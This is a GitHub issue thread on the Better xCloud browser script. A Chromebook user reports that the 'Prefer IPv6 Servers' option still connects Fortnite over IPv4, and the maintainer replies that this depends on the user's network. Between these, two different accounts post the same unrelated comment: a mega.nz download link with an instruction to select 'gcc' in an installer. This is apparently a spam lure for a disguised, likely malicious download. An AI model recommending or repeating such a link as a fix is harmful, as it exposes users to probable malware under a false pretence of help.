### ISSUE TITLE
[Bug] iPv6 Feature not working

### ISSUE THREAD

**Issue by Knight40** [redphx/better-xcloud#485]
### Checklist

- [X] I will only use English in my report.
- [X] I have used the search function for [**open and closed issues**](https://github.com/redphx/better-xcloud/issues?q=is%3Aissue) to see if someone else has already submitted the same bug report.
- [X] I will describe the problem with as much detail as possible.

### Questions

- [X] xCloud officially supports my country/region.
- [ ] The bug doesn't happen when I disable Better xCloud script.
- [X] The bug didn't happen in previous Better xCloud version (name which one).

### Device

Laptop

### Device

Google Chromebook

### Operating System

Chrome OS

### Android app/Browser Version

Chrome 127.0

### Better xCloud Version

5.5.6

### Game list

Fortnite

### Reproduction Steps

1. Turned on 'Prefer iPv6 Servers'
2. Launched Fortnite
3. Checked three dots
4. Showed that its running on iPv4 servers

### Screenshot/video

![Screenshot 2024-08-25 12 43 55](https://github.com/user-attachments/assets/eedd57d0-2d4c-405f-a21e-13a137d537fb)

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by redphx** [comment]
Not a bug. It depends on your network.

**Comment by Knight40** [comment]
it used to work though?
